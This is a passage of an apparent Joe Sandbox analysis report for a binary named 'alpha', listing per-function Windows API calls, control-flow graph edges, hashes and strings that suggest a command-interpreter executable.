                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DBB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DCA
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DE0
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DEE
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E04
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180589
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB18059E
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805AF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB1805C5
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805EF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB180605
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180632
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB180647
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                                • Part of subcall function 00007FF6EB184AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                                • Part of subcall function 00007FF6EB184AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB185554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6EB184E35), ref: 00007FF6EB1855DA
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185623
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185667
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB1856BE
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185702
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E35
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E81
                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F69
                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F95
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FB0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FC1
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FD8
                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FF8
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185037
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18504B
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850DF
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850F2
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18510F
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185130
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18514A
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185175
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                              • API String ID: 1049357271-3021193919
                                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction ID: 4b63d6c709d74c5a591814c63b6cecdbe609902b7187e5c6718eac40140f7d97
                                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                              • Instruction Fuzzy Hash: 93C17223A08A42D6EA059B51F9503F977A0FF8DBB8F454134D90E877B5DF3EA409870A
                                              Function 00007FF6EB183C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 732 7ff6eb183c24-7ff6eb183c61 733 7ff6eb183c67-7ff6eb183c99 call 7ff6eb17af14 call 7ff6eb17ca40 732->733 734 7ff6eb18ec5a-7ff6eb18ec5f 732->734 743 7ff6eb18ec97-7ff6eb18eca1 call 7ff6eb18855c 733->743 744 7ff6eb183c9f-7ff6eb183cb2 call 7ff6eb17b900 733->744 734->733 736 7ff6eb18ec65-7ff6eb18ec6a 734->736 737 7ff6eb18412e-7ff6eb18415b call 7ff6eb188f80 736->737 744->743 749 7ff6eb183cb8-7ff6eb183cbc 744->749 750 7ff6eb183cbf-7ff6eb183cc7 749->750 750->750 751 7ff6eb183cc9-7ff6eb183ccd 750->751 752 7ff6eb183cd2-7ff6eb183cd8 751->752 753 7ff6eb183cda-7ff6eb183cdf 752->753 754 7ff6eb183ce5-7ff6eb183d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff6eb183faa-7ff6eb183fb3 753->755 756 7ff6eb183fb8 754->756 757 7ff6eb183d68-7ff6eb183d6c 754->757 755->752 759 7ff6eb183fc6-7ff6eb183fec GetLastError call 7ff6eb18855c call 7ff6eb18a5d6 756->759 757->756 758 7ff6eb183d72-7ff6eb183dcd towupper GetFullPathNameW 757->758 758->759 760 7ff6eb183dd3-7ff6eb183ddd 758->760 763 7ff6eb183ff1-7ff6eb184007 call 7ff6eb18855c _local_unwind 759->763 762 7ff6eb183de3-7ff6eb183dfb 760->762 760->763 765 7ff6eb183e01-7ff6eb183e11 762->765 766 7ff6eb1840fe-7ff6eb184119 call 7ff6eb18855c _local_unwind 762->766 774 7ff6eb18400c-7ff6eb184022 GetLastError 763->774 765->766 770 7ff6eb183e17-7ff6eb183e28 765->770 777 7ff6eb18411a-7ff6eb18412c call 7ff6eb17ff70 call 7ff6eb18855c 766->777 773 7ff6eb183e2c-7ff6eb183e34 770->773 773->773 778 7ff6eb183e36-7ff6eb183e3f 773->778 775 7ff6eb184028-7ff6eb18402b 774->775 776 7ff6eb183e95-7ff6eb183e9c 774->776 775->776 780 7ff6eb184031-7ff6eb184047 call 7ff6eb18855c _local_unwind 775->780 781 7ff6eb183ecf-7ff6eb183ed3 776->781 782 7ff6eb183e9e-7ff6eb183ec2 call 7ff6eb182978 776->782 777->737 779 7ff6eb183e42-7ff6eb183e55 778->779 784 7ff6eb183e57-7ff6eb183e60 779->784 785 7ff6eb183e66-7ff6eb183e8f GetFileAttributesW 779->785 799 7ff6eb18404c-7ff6eb184062 call 7ff6eb18855c _local_unwind 780->799 788 7ff6eb183f08-7ff6eb183f0b 781->788 789 7ff6eb183ed5-7ff6eb183ef7 GetFileAttributesW 781->789 793 7ff6eb183ec7-7ff6eb183ec9 782->793 784->785 791 7ff6eb183f9d-7ff6eb183fa5 784->791 785->774 785->776 797 7ff6eb183f0d-7ff6eb183f11 788->797 798 7ff6eb183f1e-7ff6eb183f40 SetCurrentDirectoryW 788->798 794 7ff6eb183efd-7ff6eb183f02 789->794 795 7ff6eb184067-7ff6eb184098 GetLastError call 7ff6eb18855c _local_unwind 789->795 791->779 793->781 793->799 794->788 801 7ff6eb18409d-7ff6eb1840b3 call 7ff6eb18855c _local_unwind 794->801 795->801 803 7ff6eb183f46-7ff6eb183f69 call 7ff6eb18498c 797->803 804 7ff6eb183f13-7ff6eb183f1c 797->804 798->803 805 7ff6eb1840b8-7ff6eb1840de GetLastError call 7ff6eb18855c _local_unwind 798->805 799->795 801->805 815 7ff6eb1840e3-7ff6eb1840f9 call 7ff6eb18855c _local_unwind 803->815 816 7ff6eb183f6f-7ff6eb183f98 call 7ff6eb18417c 803->816 804->798 804->803 805->815 815->766 816->777
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                              • String ID: :
                                              • API String ID: 1809961153-336475711
                                              • Opcode ID: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                              • Instruction ID: 1f60cd9bbc0996f7414b361ea76b735bf15cc5d9726298aba7e651787a85e57c
                                              • Opcode Fuzzy Hash: ba32b8838d86428b32df37d2d44875712fc0c8ae3247368b5d273864595a39ba
                                              • Instruction Fuzzy Hash: 18D18F23A0CB8582EA20DB15E4443FAB7A1FB89768F444135E94E837B4EF3DE445CB46
                                              Function 00007FF6EB182394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 914 7ff6eb182394-7ff6eb182416 memset call 7ff6eb17ca40 917 7ff6eb18241c-7ff6eb182453 GetModuleFileNameW call 7ff6eb18081c 914->917 918 7ff6eb18e0d2-7ff6eb18e0da call 7ff6eb184c1c 914->918 923 7ff6eb18e0db-7ff6eb18e0ee call 7ff6eb18498c 917->923 924 7ff6eb182459-7ff6eb182468 call 7ff6eb18081c 917->924 918->923 929 7ff6eb18e0f4-7ff6eb18e107 call 7ff6eb18498c 923->929 924->929 930 7ff6eb18246e-7ff6eb18247d call 7ff6eb18081c 924->930 939 7ff6eb18e10d-7ff6eb18e123 929->939 935 7ff6eb182516-7ff6eb182529 call 7ff6eb18498c 930->935 936 7ff6eb182483-7ff6eb182492 call 7ff6eb18081c 930->936 935->936 936->939 947 7ff6eb182498-7ff6eb1824a7 call 7ff6eb18081c 936->947 942 7ff6eb18e13f-7ff6eb18e17a _wcsupr 939->942 943 7ff6eb18e125-7ff6eb18e139 wcschr 939->943 945 7ff6eb18e181-7ff6eb18e199 wcsrchr 942->945 946 7ff6eb18e17c-7ff6eb18e17f 942->946 943->942 944 7ff6eb18e27c 943->944 949 7ff6eb18e283-7ff6eb18e29b call 7ff6eb18498c 944->949 948 7ff6eb18e19c 945->948 946->948 956 7ff6eb1824ad-7ff6eb1824c5 call 7ff6eb183c24 947->956 957 7ff6eb18e2a1-7ff6eb18e2c3 _wcsicmp 947->957 951 7ff6eb18e1a0-7ff6eb18e1a7 948->951 949->957 951->951 954 7ff6eb18e1a9-7ff6eb18e1bb 951->954 958 7ff6eb18e1c1-7ff6eb18e1e6 954->958 959 7ff6eb18e264-7ff6eb18e277 call 7ff6eb181300 954->959 964 7ff6eb1824ca-7ff6eb1824db 956->964 962 7ff6eb18e1e8-7ff6eb18e1f1 958->962 963 7ff6eb18e21a 958->963 959->944 965 7ff6eb18e201-7ff6eb18e210 962->965 966 7ff6eb18e1f3-7ff6eb18e1f6 962->966 969 7ff6eb18e21d-7ff6eb18e21f 963->969 967 7ff6eb1824dd-7ff6eb1824e4 ??_V@YAXPEAX@Z 964->967 968 7ff6eb1824e9-7ff6eb182514 call 7ff6eb188f80 964->968 965->963 971 7ff6eb18e212-7ff6eb18e218 965->971 966->965 970 7ff6eb18e1f8-7ff6eb18e1ff 966->970 967->968 969->949 973 7ff6eb18e221-7ff6eb18e228 969->973 970->965 970->966 971->969 975 7ff6eb18e254-7ff6eb18e262 973->975 976 7ff6eb18e22a-7ff6eb18e231 973->976 975->944 977 7ff6eb18e234-7ff6eb18e237 976->977 977->975 978 7ff6eb18e239-7ff6eb18e242 977->978 978->975 979 7ff6eb18e244-7ff6eb18e252 978->979 979->975 979->977
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                              • API String ID: 2622545777-4197029667
                                              • Opcode ID: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                              • Instruction ID: 6143400cad677a3334bf9ca6740809d1e8a5e01f72bdf39e781978dd1fa24f09
                                              • Opcode Fuzzy Hash: 2b85e5479cd390d5377cb4198706a5dfd2306e24395425d55588407f45c83467
                                              • Instruction Fuzzy Hash: 89919263B09B8285EE258B50E8503F863A1FF4DBA8F444135C90E876B5DF3EE508C74A
                                              Function 00007FF6EB180580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID: CMD.EXE
                                              • API String ID: 1606018815-3025314500
                                              • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                              • Instruction ID: 870ec13ea2fa7a0c70a55e84f2c571c448913e349f6e48448700ccfb124cc7b3
                                              • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                              • Instruction Fuzzy Hash: D441C137A19642DBE6144B14E8553F87AA0FB8E779F558139C50EC2378DF3EB4188A0A
                                              Function 00007FF6EB17C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 992 7ff6eb17c620-7ff6eb17c66f GetConsoleTitleW 993 7ff6eb18c5f2 992->993 994 7ff6eb17c675-7ff6eb17c687 call 7ff6eb17af14 992->994 996 7ff6eb18c5fc-7ff6eb18c60c GetLastError 993->996 999 7ff6eb17c689 994->999 1000 7ff6eb17c68e-7ff6eb17c69d call 7ff6eb17ca40 994->1000 998 7ff6eb18c5e3 call 7ff6eb173278 996->998 1004 7ff6eb18c5e8-7ff6eb18c5ed call 7ff6eb18855c 998->1004 999->1000 1000->1004 1005 7ff6eb17c6a3-7ff6eb17c6ac 1000->1005 1004->993 1007 7ff6eb17c954-7ff6eb17c95e call 7ff6eb18291c 1005->1007 1008 7ff6eb17c6b2-7ff6eb17c6c5 call 7ff6eb17b9c0 1005->1008 1013 7ff6eb18c5de-7ff6eb18c5e0 1007->1013 1014 7ff6eb17c964-7ff6eb17c972 call 7ff6eb1789c0 1007->1014 1015 7ff6eb17c6cb-7ff6eb17c6ce 1008->1015 1016 7ff6eb17c9b5-7ff6eb17c9b8 call 7ff6eb185c6c 1008->1016 1013->998 1014->996 1024 7ff6eb17c978-7ff6eb17c99a towupper 1014->1024 1015->1004 1018 7ff6eb17c6d4-7ff6eb17c6e9 1015->1018 1023 7ff6eb17c9bd-7ff6eb17c9c9 call 7ff6eb18855c 1016->1023 1021 7ff6eb18c616-7ff6eb18c620 call 7ff6eb18855c 1018->1021 1022 7ff6eb17c6ef-7ff6eb17c6fa 1018->1022 1025 7ff6eb18c627 1021->1025 1022->1025 1026 7ff6eb17c700-7ff6eb17c713 1022->1026 1037 7ff6eb17c9d0-7ff6eb17c9d7 1023->1037 1029 7ff6eb17c9a0-7ff6eb17c9a9 1024->1029 1030 7ff6eb18c631 1025->1030 1026->1030 1031 7ff6eb17c719-7ff6eb17c72c 1026->1031 1029->1029 1034 7ff6eb17c9ab-7ff6eb17c9af 1029->1034 1036 7ff6eb18c63b 1030->1036 1035 7ff6eb17c732-7ff6eb17c747 call 7ff6eb17d3f0 1031->1035 1031->1036 1034->1016 1038 7ff6eb18c60e-7ff6eb18c611 call 7ff6eb19ec14 1034->1038 1047 7ff6eb17c74d-7ff6eb17c750 1035->1047 1048 7ff6eb17c8ac-7ff6eb17c8af 1035->1048 1042 7ff6eb18c645 1036->1042 1040 7ff6eb17c9dd-7ff6eb18c6da SetConsoleTitleW 1037->1040 1041 7ff6eb17c872-7ff6eb17c8aa call 7ff6eb18855c call 7ff6eb188f80 1037->1041 1038->1021 1040->1041 1053 7ff6eb18c64e-7ff6eb18c651 1042->1053 1049 7ff6eb17c76a-7ff6eb17c76d 1047->1049 1050 7ff6eb17c752-7ff6eb17c764 call 7ff6eb17bd38 1047->1050 1048->1047 1052 7ff6eb17c8b5-7ff6eb17c8d3 wcsncmp 1048->1052 1056 7ff6eb17c773-7ff6eb17c77a 1049->1056 1057 7ff6eb17c840-7ff6eb17c84b call 7ff6eb17cb40 1049->1057 1050->1004 1050->1049 1052->1049 1058 7ff6eb17c8d9 1052->1058 1059 7ff6eb17c80d-7ff6eb17c811 1053->1059 1060 7ff6eb18c657-7ff6eb18c65b 1053->1060 1065 7ff6eb17c780-7ff6eb17c784 1056->1065 1077 7ff6eb17c84d-7ff6eb17c855 call 7ff6eb17cad4 1057->1077 1078 7ff6eb17c856-7ff6eb17c86c 1057->1078 1058->1047 1061 7ff6eb17c817-7ff6eb17c81b 1059->1061 1062 7ff6eb17c9e2-7ff6eb17c9e7 1059->1062 1060->1059 1067 7ff6eb17ca1b-7ff6eb17ca1f 1061->1067 1068 7ff6eb17c821 1061->1068 1062->1061 1069 7ff6eb17c9ed-7ff6eb17c9f7 call 7ff6eb18291c 1062->1069 1070 7ff6eb17c83d 1065->1070 1071 7ff6eb17c78a-7ff6eb17c7a4 wcschr 1065->1071 1067->1068 1079 7ff6eb17ca25-7ff6eb18c6b3 call 7ff6eb173278 1067->1079 1073 7ff6eb17c824-7ff6eb17c82d 1068->1073 1086 7ff6eb17c9fd-7ff6eb17ca00 1069->1086 1087 7ff6eb18c684-7ff6eb18c698 call 7ff6eb173278 1069->1087 1070->1057 1075 7ff6eb17c7aa-7ff6eb17c7ad 1071->1075 1076 7ff6eb17c8de-7ff6eb17c8f7 1071->1076 1073->1073 1080 7ff6eb17c82f-7ff6eb17c837 1073->1080 1082 7ff6eb17c7b0-7ff6eb17c7b8 1075->1082 1083 7ff6eb17c900-7ff6eb17c908 1076->1083 1077->1078 1078->1037 1078->1041 1079->1004 1080->1065 1080->1070 1082->1082 1088 7ff6eb17c7ba-7ff6eb17c7c7 1082->1088 1083->1083 1089 7ff6eb17c90a-7ff6eb17c915 1083->1089 1086->1061 1094 7ff6eb17ca06-7ff6eb17ca10 call 7ff6eb1789c0 1086->1094 1087->1004 1088->1053 1095 7ff6eb17c7cd-7ff6eb17c7db 1088->1095 1096 7ff6eb17c93a-7ff6eb17c944 1089->1096 1097 7ff6eb17c917 1089->1097 1094->1061 1111 7ff6eb17ca16-7ff6eb18c67f GetLastError call 7ff6eb173278 1094->1111 1100 7ff6eb17c7e0-7ff6eb17c7e7 1095->1100 1103 7ff6eb17ca2a-7ff6eb17ca2f call 7ff6eb189158 1096->1103 1104 7ff6eb17c94a 1096->1104 1101 7ff6eb17c920-7ff6eb17c928 1097->1101 1106 7ff6eb17c7e9-7ff6eb17c7f1 1100->1106 1107 7ff6eb17c800-7ff6eb17c803 1100->1107 1108 7ff6eb17c92a-7ff6eb17c92f 1101->1108 1109 7ff6eb17c932-7ff6eb17c938 1101->1109 1103->1013 1104->1007 1106->1107 1112 7ff6eb17c7f3-7ff6eb17c7fe 1106->1112 1107->1042 1113 7ff6eb17c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1004 1112->1100 1112->1107 1113->1059
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleTitlewcschr
                                              • String ID: /$:
                                              • API String ID: 2364928044-4222935259
                                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction ID: 703023586abbfd6ef03f8b7b566fa68959eb08e141c276bcfd451d7eb1c1ea26
                                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction Fuzzy Hash: 55C1DF63A0865281EB549B25D4143F963A1FF8ABB8F548131D91EC32F5DFBEE444C70A
                                              Function 00007FF6EB188D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
